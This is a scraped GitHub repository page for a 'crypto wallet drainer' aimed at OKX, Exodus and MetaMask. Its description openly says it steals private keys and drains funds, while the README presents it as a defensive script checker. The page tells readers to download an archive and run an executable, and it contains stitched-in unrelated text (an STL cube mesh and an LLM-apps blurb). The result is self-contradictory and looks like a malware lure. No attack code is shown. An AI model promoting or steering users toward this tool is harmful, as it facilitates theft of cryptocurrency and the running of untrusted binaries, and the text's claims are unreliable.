Skip to content

Exploits crypto wallet vulnerabilities to drain funds from platforms like OKX, Exodus, and MetaMask by injecting malicious scripts that bypass security checks and steal private keys or session data.

License

Notifications You must be signed in to change notification settings

Zentivarum/Crypto-Wallet-Drainer-Okx-Exodus-Metamask-Script-Checker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Unwind AI

What is Crypto Drainer?

Crypto Wallet Drainer Script Checker is a security-focused tool designed to detect and analyze malicious scripts targeting popular crypto wallets like OKX, Exodus, and MetaMask. It scans injected code, browser extensions, or external scripts for behaviors typical of drainers β€” such as unauthorized fund transfers or private key access. Built for ethical hackers, auditors, and developers, this tool enables safe testing and enhanced wallet defense. Whether you're analyzing suspicious code or building secure wallet apps, Drainer Script Checker helps stay ahead of wallet-draining threats with speed and clarity. For research and protection purposes only.

Media

vbnvbn

zxc.mp4

Features

  • 1. Multi-Wallet Scanning: Supports OKX, Exodus, and MetaMask.
  • 2. Drainer Script Detection: Identifies malicious withdrawal scripts.
  • 3. Real-Time Alerts: Warns on suspicious behavior or code injection.
  • 4. Code Analysis Engine: Parses and flags high-risk functions.
  • 5. Lightweight Interface: CLI and optional Web UI support.
  • 6. Security Focused: Built for ethical testing and defense.

Preview

Installation

  1. Download Visual Studio 2022 using Git Clone Or either download the project or exit the rar. Then Download Visual Studio 2022 Here Link VisualStudio Download last1

Download These

  1. OR

download

  1. Then open the sln (Project Solution) file

vsgif

  1. Find Executable File
    /ProjectName/Bin/Debug/Executable.exe

How to Use

  1. Open the Application

    • Locate the executable file (.exe) on your computer and double-click it to launch the program.
  2. Select Target and Adjust Settings

    • Choose your desired target or task from the available options.
    • Customize any additional settings (e.g., preferences, configurations) to fit your needs.
  3. Generate a Secure Password

    • Use the built-in feature to create a strong password hashed with the SHA-256 algorithm. This ensures your password is secure and encrypted.
  4. Start the Process

    • Click the "Start" button or press Ctrl + V to begin the operation.
    • When prompted, enter the password you generated in the previous step.
  5. Provide API Key (If Required)

    • If the application needs an API key to function (e.g., for external services), go to the settings and input your valid API key before proceeding.
  6. Start the Server

    • Once everything is configured, start the server. Wait for the connection to be established. A stable connection is necessary for the app to work properly.
  7. Troubleshoot Errors (If Any)

    • If you encounter errors, ensure the following are installed on your system:
      • Node.js: Download and install it from nodejs.org.
      • Visual Studio Build Tools: Install these tools to resolve technical issues.

Contributing

Licence

Project is licenced under the MIT licence.

solid cube_corner
  facet normal 0.0 -1.0 0.0
    outer loop
      vertex 0.0 0.0 0.0
      vertex 1.0 0.0 0.0
      vertex 0.0 0.0 1.0
    endloop
  endfacet
  facet normal 0.0 0.0 -1.0
    outer loop
      vertex 0.0 0.0 0.0
      vertex 0.0 1.0 0.0
      vertex 1.0 0.0 0.0
    endloop
  endfacet
  facet normal -1.0 0.0 0.0
    outer loop
      vertex 0.0 0.0 0.0
      vertex 0.0 0.0 1.0
      vertex 0.0 1.0 0.0
    endloop
  endfacet
  facet normal 0.577 0.577 0.577
    outer loop
      vertex 1.0 0.0 0.0
      vertex 0.0 1.0 0.0
      vertex 0.0 0.0 1.0
    endloop
  endfacet
endsolid
Loading

🌟 Awesome

A curated collection of awesome LLM apps built with RAG and AI agents. This repository features LLM apps that use models from OpenAI, Anthropic, Google, and open-source models like DeepSeek, Qwen or Llama that you can run locally on your computer.

snake

About

Exploits crypto wallet vulnerabilities to drain funds from platforms like OKX, Exodus, and MetaMask by injecting malicious scripts that bypass security checks and steal private keys or session data.

Topics

Resources

License

Security policy

Stars

Watchers

Forks

Sponsor this project

Packages

No packages published

Contributors 2

  •  
  •  

Languages